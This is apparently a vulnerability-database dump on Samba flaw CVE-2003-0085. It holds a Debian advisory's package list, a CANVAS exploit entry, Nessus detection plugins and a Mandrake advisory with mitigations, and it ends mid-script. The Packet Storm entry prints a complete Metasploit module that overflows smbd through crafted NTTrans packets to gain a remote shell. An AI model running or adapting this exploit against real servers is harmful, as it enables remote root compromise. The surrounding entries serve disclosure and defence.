http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_hppa.deb\r\n Size/MD5 checksum: 1081314 09ea41541c03f8e1c7da6a6c3e6bb437\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_hppa.deb\r\n Size/MD5 checksum: 490812 2757ce04bf7ba705992ef6c5b42da943\r\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_hppa.deb\r\n Size/MD5 checksum: 1084730 84eb32632058606e10dfc8b4d7a72552\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_hppa.deb\r\n Size/MD5 checksum: 589142 df11a8ed279bcc3461ca8a2a08c5e1db\r\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_hppa.deb\r\n Size/MD5 checksum: 901054 75e9ed419e91cce810e286f245b7a5ed\r\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_hppa.deb\r\n Size/MD5 checksum: 419358 a90c8c66a1370a973a8d757c112704e0\r\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_hppa.deb\r\n Size/MD5 checksum: 1059718 c8bcd60bc3d799753215fffd840aec78\r\n\r\n i386 architecture &#40;Intel ia32&#41;\r\n\r\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_i386.deb\r\n Size/MD5 checksum: 953846 2ddc41e683b123557c4f95a6d729f650\r\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_i386.deb\r\n Size/MD5 checksum: 2417120 40e0ab43c7c2a05b4321acfe5b3ae92a\r\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_i386.deb\r\n Size/MD5 checksum: 535058 641d95a5c5a27922448fad10b9b8faf5\r\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_i386.deb\r\n Size/MD5 checksum: 930150 ffb594a4b2b89818b05fab828d3cbc2f\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_i386.deb\r\n Size/MD5 checksum: 446010 91462c2c5f11ded29d923b1056d4a7f5\r\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_i386.deb\r\n Size/MD5 checksum: 793204 d82a61e9731f157a20f26748e3301b5a\r\n http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_i386.deb\r\n Size/MD5 checksum: 993054 27c24ec813a504eb098f3c6bff1d0648\r\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_i386.deb\r\n Size/MD5 checksum: 388574 290c9c668bc96ea9d05713e3d6fa0301\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_i386.deb\r\n Size/MD5 checksum: 499736 bf6b7464efc203709fee5bcaf5de2f4d\r\n\r\n ia64 architecture &#40;Intel ia64&#41;\r\n\r\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_ia64.deb\r\n Size/MD5 checksum: 3487288 620b57d229cababb19cf11292343a4f5\r\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_ia64.deb\r\n Size/MD5 checksum: 695242 c2801159a9ae051c27507bbc102115b9\r\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_ia64.deb\r\n Size/MD5 checksum: 1097430 43756ff78b0400a834b8a818399c2e30\r\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_ia64.deb\r\n Size/MD5 checksum: 1328162 1de9184ba777c75e8d64d54cdaeeda21\r\n http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_ia64.deb\r\n Size/MD5 checksum: 1248348 90d5fa39afefc9a48212a9bf06bac0db\r\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_ia64.deb\r\n Size/MD5 checksum: 1281494 70a87465a6370a37bb3add200a20d806\r\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_ia64.deb\r\n Size/MD5 checksum: 461376 cdc7a75cbe2a4ca4aea3151190f975d4\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_ia64.deb\r\n Size/MD5 checksum: 553364 373b3d6335bc8898195703be951d2c35\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_ia64.deb\r\n Size/MD5 checksum: 624498 f3f89a26c5efba738d74edb5a898cac1\r\n\r\n mips architecture &#40;MIPS &#40;Big Endian&#41;&#41;\r\n\r\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_mips.deb\r\n Size/MD5 checksum: 1027468 fbb755a07a56430713f039b4926ac50d\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_mips.deb\r\n Size/MD5 checksum: 569254 a293262cf7c26940df99859b296d4305\r\n http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_mips.deb\r\n Size/MD5 checksum: 1078026 a149c42542eda0b32ccfb69131e2238c\r\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_mips.deb\r\n Size/MD5 checksum: 910160 4f994a4ed297fb00bc2cd015c26a0cc4\r\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_mips.deb\r\n Size/MD5 checksum: 395814 1b4cd57c7ce2bfbe1fde054ebbd43c8d\r\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_mips.deb\r\n Size/MD5 checksum: 580840 ec476202e7871294587777f2a2c84b8c\r\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_mips.deb\r\n Size/MD5 checksum: 2803220 8ff0254ff5f06a73d2e0ea7da445e897\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_mips.deb\r\n Size/MD5 checksum: 459092 5be701b06e8a8cd2743d46e9fc51ff77\r\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_mips.deb\r\n Size/MD5 checksum: 1088036 d0c0c9ee281aacaff919b27f6c9d1b34\r\n\r\n mipsel architecture &#40;MIPS &#40;Little Endian&#41;&#41;\r\n\r\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_mipsel.deb\r\n Size/MD5 checksum: 1014748 56509d2718ca53e71f91a4be3abe41ea\r\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_mipsel.deb\r\n Size/MD5 checksum: 1075490 c225c5f47f3265e7993aa5c8a61263c4\r\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_mipsel.deb\r\n Size/MD5 checksum: 576358 41e83b24d1397cb8f110b384c7d92abc\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_mipsel.deb\r\n Size/MD5 checksum: 453662 3b167bf61b72b025dde36b128e743c71\r\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_mipsel.deb\r\n Size/MD5 checksum: 2763676 200e4a3cc98a76029a91660053a8af51\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_mipsel.deb\r\n Size/MD5 checksum: 562180 b9be983799efeebedae75b92cbe0ac1f\r\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_mipsel.deb\r\n Size/MD5 checksum: 896746 4542a9d8768065507f8f095fced8be53\r\n http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_mipsel.deb\r\n Size/MD5 checksum: 1071216 647dff52bda6360f48955a872e58c1af\r\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_mipsel.deb\r\n Size/MD5 checksum: 391904 d5dfa893c8e6a014b4fbf39c4adada22\r\n\r\n powerpc architecture &#40;PowerPC&#41;\r\n\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_powerpc.deb\r\n Size/MD5 checksum: 545998 2189d56eb150c7854160198e2290c92f\r\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_powerpc.deb\r\n Size/MD5 checksum: 408620 13d6efd82e9c3667219171a4e05eff58\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_powerpc.deb\r\n Size/MD5 checksum: 475424 4ed09f39f249dc22efd38d2e830985b8\r\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_powerpc.deb\r\n Size/MD5 checksum: 2607232 93845aefa1341db335442745fce21223\r\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_powerpc.deb\r\n Size/MD5 checksum: 852294 59421f785ec7f732f6db592441d36292\r\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_powerpc.deb\r\n Size/MD5 checksum: 560704 86cb4acb79c9cbe46564612f04316027\r\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_powerpc.deb\r\n Size/MD5 checksum: 1021260 4f9d182203cc960d403e3baf6d2ca700\r\n http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_powerpc.deb\r\n Size/MD5 checksum: 1036430 8f48a7fae3a659a87980d15eb2e6e31b\r\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_powerpc.deb\r\n Size/MD5 checksum: 1001326 b3108080930f871f11b6e8e5dd27a9bf\r\n\r\n s390 architecture &#40;IBM S/390&#41;\r\n\r\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_s390.deb\r\n Size/MD5 checksum: 2495850 bec14c674dfb41568fafba16a97a811d\r\n http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_s390.deb\r\n Size/MD5 checksum: 1007974 5b1dc0d8a8bb2ac1c12f0b251227bc51\r\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_s390.deb\r\n Size/MD5 checksum: 982464 dbb0ce460a451678c67f76c6651ce605\r\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_s390.deb\r\n Size/MD5 checksum: 833018 769bfaff5073e6781c22328364f253be\r\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_s390.deb\r\n Size/MD5 checksum: 965494 dc884757e2802825d73a3b96aec742c8\r\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_s390.deb\r\n Size/MD5 checksum: 402948 63a7dd67f7b2a146f605be2caab2c268\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_s390.deb\r\n Size/MD5 checksum: 469722 7a118704ee394d6db0341d00b5bea9c3\r\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_s390.deb\r\n Size/MD5 checksum: 537542 ccb4499ae9c39ce6f3062f20f5a2fc5a\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_s390.deb\r\n Size/MD5 checksum: 526406 93cfd2a823cdf2b8777f850adcf1b2e4\r\n\r\n sparc architecture &#40;Sun SPARC/UltraSPARC&#41;\r\n\r\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_sparc.deb\r\n Size/MD5 checksum: 985124 d67741960205804cc13b484faff1cbe1\r\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_sparc.deb\r\n Size/MD5 checksum: 400260 f7af05064c5e6a71c4e02508d33166f6\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_sparc.deb\r\n Size/MD5 checksum: 523622 0263afefd2b8996020606bd24ca31113\r\n http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_sparc.deb\r\n Size/MD5 checksum: 1011064 bc53ee49e2bc41c41ae72728c7de6e40\r\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_sparc.deb\r\n Size/MD5 checksum: 829240 23b17ba07f9632b1aa1773475b5efbf3\r\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_sparc.deb\r\n Size/MD5 checksum: 2513176 7d3cd01177cb74e80fcba81999420246\r\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_sparc.deb\r\n Size/MD5 checksum: 461672 11f5846a4876eb91bd88f8e829803091\r\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_sparc.deb\r\n Size/MD5 checksum: 964150 572b0a10fcddd6786c9b5c09d80953f2\r\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_sparc.deb\r\n Size/MD5 checksum: 543372 4790b19c4feea9603d444970d61f45b5\r\n\r\n- -- \r\n- ----------------------------------------------------------------------------\r\nDebian Security team &lt;team@security.debian.org&gt;\r\nhttp://www.debian.org/security/\r\nMailing-List: debian-security-announce@lists.debian.org\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.2.1 &#40;GNU/Linux&#41;\r\n\r\niD8DBQE+c1f5PLiSUC+jvC0RAl9kAJ99b4lxWGMVZCg1Y8oGK4DgV8DdtgCgqMGs\r\nJa9wjkUs3mCz24Fahb5UAu0=\r\n=/yhd\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2003-03-16T00:00:00", "published": "2003-03-16T00:00:00", "id": "SECURITYVULNS:DOC:4217", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4217", "title": "[SECURITY] [DSA-262-1] samba security fix", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2019-05-29T17:19:28", "bulletinFamily": "exploit", "description": "**Name**| samba_nttrans \n---|--- \n**CVE**| CVE-2003-0085 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| samba_nttrans \n**Notes**| References: http://www.samba.org/samba/whatsnew/samba-2.2.8.html \nCVE Name: CVE-2003-0085 \nVENDOR: Samba \nDevelopment Notes: WARNING! This exploit can get you more than one shell-listener because of the fast brute force routine. \nYou might choose to kill the extra listeners from Listeners menu but it is not a necessity. \nDate public: Mar 15, 2003 \nCERT Advisory: N/A \nVersions Tested: \nSolaris 8 sun4u samba-2.2.2-sol8-sparc-local.gz (sunfreeware.com) \nSolaris 8 sun4u samba-2.2.7a-sol8-sparc-local.gz (sunfreeware.com) \nSolaris 2.6 sun4u samba-2.2.7a-sol8-sparc-local.gz (sunfreeware.com) \nRed Hat Linux release 8.0 (Psyche): samba-2.2.7-4.8.0.rpm kernel: 2.4.18-14 \nRed Hat Linux release 7.3 x86 samba 2.2.3a: samba-2.2.3a-6.rpm \nRed Hat Linux release 7.2 (Enigma): samba-2.2.1a-4.rpm kernel: 2.4.7-10 \nRed Hat Linux release 7.1 (Seawolf): samba-2.0.7-36 \nMandrake Linux release 8.2 (Bluebird) x586:samba-2.2.3a-10mdk.rpm \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0085 \nCVSS: 10.0 \n\n", "modified": "2003-03-31T05:00:00", "published": "2003-03-31T05:00:00", "id": "SAMBA_NTTRANS", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/samba_nttrans", "type": "canvas", "title": "Immunity Canvas: SAMBA_NTTRANS", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:46", "bulletinFamily": "exploit", "description": "", "modified": "2009-10-28T00:00:00", "published": "2009-10-28T00:00:00", "href": "https://packetstormsecurity.com/files/82287/Samba-nttrans-Overflow.html", "id": "PACKETSTORM:82287", "title": "Samba nttrans Overflow", "type": "packetstorm", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::SMB \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Samba nttrans Overflow', \n'Description' => %q{ \n \n}, \n'Author' => [ 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2003-0085' ], \n[ 'OSVDB', '6323' ], \n[ 'BID', '7106' ], \n], \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n'MinNops' => 512, \n}, \n'Targets' => \n[ \n[\"Samba 2.2.x Linux x86\", \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux', \n'Rets' => [0x01020304, 0x41424344], \n}, \n], \n], \n'DisclosureDate' => 'Apr 7 2003' \n)) \n \nregister_options( \n[ \nOpt::RPORT(139) \n], self.class) \n \nend \n \ndef exploit \n \n# 0x081fc968 \n \npattern = Rex::Text.pattern_create(12000) \n \npattern[532, 4] = [0x81b847c].pack('V') \npattern[836, payload.encoded.length] = payload.encoded \n \n# 0x081b8138 \n \n \nconnect \nsmb_login \n \ntarg_address = 0xfffbb7d0 \n \n# \n# Send a NTTrans request with ParameterCountTotal set to the buffer length \n# \n \nsubcommand = 1 \nparam = '' \nbody = '' \nsetup_count = 0 \nsetup_data = '' \ndata = param + body \n \npkt = CONST::SMB_NTTRANS_PKT.make_struct \nself.simple.client.smb_defaults(pkt['Payload']['SMB']) \n \nbase_offset = pkt.to_s.length + (setup_count * 2) - 4 \nparam_offset = base_offset \ndata_offset = param_offset + param.length \n \npkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT \npkt['Payload']['SMB'].v['Flags1'] = 0x18 \npkt['Payload']['SMB'].v['Flags2'] = 0x2001 \npkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count \n \npkt['Payload'].v['ParamCountTotal'] =12000 \npkt['Payload'].v['DataCountTotal'] = body.length \npkt['Payload'].v['ParamCountMax'] = 1024 \npkt['Payload'].v['DataCountMax'] = 65504 \npkt['Payload'].v['ParamCount'] = param.length \npkt['Payload'].v['ParamOffset'] = param_offset \npkt['Payload'].v['DataCount'] = body.length \npkt['Payload'].v['DataOffset'] = data_offset \npkt['Payload'].v['SetupCount'] = setup_count \npkt['Payload'].v['SetupData'] = setup_data \npkt['Payload'].v['Subcommand'] = subcommand \n \npkt['Payload'].v['Payload'] = data \n \nself.simple.client.smb_send(pkt.to_s) \nack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT) \n \n# \n# Send a NTTrans secondary request with the magic displacement \n# \n \nparam = pattern \nbody = '' \ndata = param + body \n \npkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct \nself.simple.client.smb_defaults(pkt['Payload']['SMB']) \n \nbase_offset = pkt.to_s.length - 4 \nparam_offset = base_offset \ndata_offset = param_offset + param.length \n \npkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY \npkt['Payload']['SMB'].v['Flags1'] = 0x18 \npkt['Payload']['SMB'].v['Flags2'] = 0x2001 \npkt['Payload']['SMB'].v['WordCount'] = 18 \n \npkt['Payload'].v['ParamCountTotal'] = param.length \npkt['Payload'].v['DataCountTotal'] = body.length \npkt['Payload'].v['ParamCount'] = param.length \npkt['Payload'].v['ParamOffset'] = param_offset \npkt['Payload'].v['ParamDisplace'] = targ_address \npkt['Payload'].v['DataCount'] = body.length \npkt['Payload'].v['DataOffset'] = data_offset \n \npkt['Payload'].v['Payload'] = data \n \nself.simple.client.smb_send(pkt.to_s) \nack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY) \n \n \nhandler \n \nend \n \nend \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/82287/nttrans.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:07:47", "bulletinFamily": "scanner", "description": "The remote Samba server, according to its version number, is vulnerable to multiple flaws that could let an attacker gain a root shell on this host.", "modified": "2018-07-27T00:00:00", "id": "SAMBA_TNG_FLAWS.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=11442", "published": "2003-03-22T00:00:00", "title": "Samba TNG < 0.3.1 Multiple Remote Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# Ref: \n#\n# Date: Sat, 22 Mar 2003 21:03:11 +0100 (CET)\n# From: Stephan Lauffer <lauffer@ph-freiburg.de>\n# To: tng-announcements@lists.dcerpc.org\n# Cc: tng-technical@lists.dcerpc.org, <tng-users@lists.dcerpc.org>\n# Subject: [ANNOUNCE] Samba-TNG 0.3.1 Security Release\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11442);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/07/27 18:38:14\");\n\n script_cve_id(\"CVE-2003-0085\");\n script_bugtraq_id(7106, 7206);\n\n script_name(english: \"Samba TNG < 0.3.1 Multiple Remote Vulnerabilities\");\n script_summary(english: \"checks samba version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code may be run on the remote server.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Samba server, according to its version number, is vulnerable \nto multiple flaws that could let an attacker gain a root shell on this \nhost.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Samba TNG 0.3.1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\nscript_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/03/22\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/07/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:samba:samba\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.\");\n script_family(english: \"Gain a shell remotely\");\n script_dependencie(\"smb_nativelanman.nasl\");\n script_require_keys(\"SMB/NativeLanManager\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\nlanman = get_kb_item(\"SMB/NativeLanManager\");\nif(\"Samba\" >< lanman)\n{\n if(ereg(pattern:\"Samba TNG-alpha$\", string:lanman))security_hole(139);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:07:59", "bulletinFamily": "scanner", "description": "<p>The SuSE security team, during an audit of the Samba source code, found a flaw in the main smbd code which could allow an external attacker to remotely and anonymously gain root privilege on a system running the Samba server. This flaw exists in all version of Samba 2.x up to and including 2.2.7a. The Samba team announced 2.2.8 today, however these updated packages include a patch that corrects this problem.</p>\n\n<p>MandrakeSoft urges all users to upgrade immediately. If you are unable to apply the updated packages (perhaps due to unavailability on your preferred mirror), the following steps can be taken to protect an unpatched system:</p>\n\n<p>The 'hosts allow' and 'hosts deny' options in the smb.conf file can be used to allow access to your Samba server by only selected hosts;\nfor example:</p>\n\n<pre> hosts allow = 127.0.0.1 192.168.2.0/24 192.168.3.0/24 hosts deny = 0.0.0.0/0 </pre>\n\n<p>This will disallow all connections from machines that are not the localhost or in the 192.168.2 and 192.168.3 private networks.\nAlternatively, you can tell Samba to listen to only specific network interfaces by using the 'interfaces' and 'bind interfaces only' options:</p>\n\n<pre> interfaces = eth1 lo bind interfaces only = yes </pre>\n\n<p>Obviously, use the internal interface for your network and not an external interface connected to the internet. You may also choose to firewall off some UDP and TCP ports in addition to the previously mentioned suggestions by blocking external access to ports 137 and 138 (UDP) and ports 139 and 445 (TCP).</p>\n\n<p>These steps should only be used as a temporary preventative measure and all users should upgrade as quickly as possible.</p>\n\n<p>Thanks to Sebastian Krahmer and the SuSE security team for performing the audit, Jeremy Allison for providing the fix, and Andrew Tridgell for providing advice on how to protect an unpatched Samba system.</p>", "modified": "2018-07-19T00:00:00", "id": "MANDRAKE_MDKSA-2003-032.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=14016", "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : samba (MDKSA-2003:032)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2003:032. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14016);\n script_version (\"1.19\");\n script_cvs_date(\"Date: 2018/07/19 20:59:12\");\n\n script_cve_id(\"CVE-2003-0085\", \"CVE-2003-0086\");\n script_xref(name:\"MDKSA\", value:\"2003:032\");\n\n script_name(english:\"Mandrake Linux Security Advisory : samba (MDKSA-2003:032)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"<p>The SuSE security team, during an audit of the Samba source code,\nfound a flaw in the main smbd code which could allow an external\nattacker to remotely and anonymously gain root privilege on a system\nrunning the Samba server. This flaw exists in all version of Samba 2.x\nup to and including 2.2.7a. The Samba team announced 2.2.8 today,\nhowever these updated packages include a patch that corrects this\nproblem.</p>\n\n<p>MandrakeSoft urges all users to upgrade immediately. If you are\nunable to apply the updated packages (perhaps due to unavailability on\nyour preferred mirror), the following steps can be taken to protect an\nunpatched system:</p>\n\n<p>The 'hosts allow' and 'hosts deny' options in the smb.conf file can\nbe used to allow access to your Samba server by only selected hosts;\nfor example:</p>\n\n<pre> hosts allow = 127.0.0.1 192.168.2.0/24 192.168.3.0/24 hosts deny\n= 0.0.0.0/0 </pre>\n\n<p>This will disallow all connections from machines that are not the\nlocalhost or in the 192.168.2 and 192.168.3 private networks.\nAlternatively, you can tell Samba to listen to only specific network\ninterfaces by using the 'interfaces' and 'bind interfaces only'\noptions:</p>\n\n<pre> interfaces = eth1 lo bind interfaces only = yes </pre>\n\n<p>Obviously, use the internal interface for your network and not an\nexternal interface connected to the internet. You may also choose to\nfirewall off some UDP and TCP ports in addition to the previously\nmentioned suggestions by blocking external access to ports 137 and 138\n(UDP) and ports 139 and 445 (TCP).</p>\n\n<p>These steps should only be used as a temporary preventative measure\nand all users should upgrade as quickly as possible.</p>\n\n<p>Thanks to Sebastian Krahmer and the SuSE security team for\nperforming the audit, Jeremy Allison for providing the fix, and Andrew\nTridgell for providing advice on how to protect an unpatched Samba\nsystem.</p>\"\n );\n # http://www.samba.org/samba/whatsnew/samba-2.2.8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.samba.org/samba/history/samba-2.2.10.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nss_wins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/03/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", 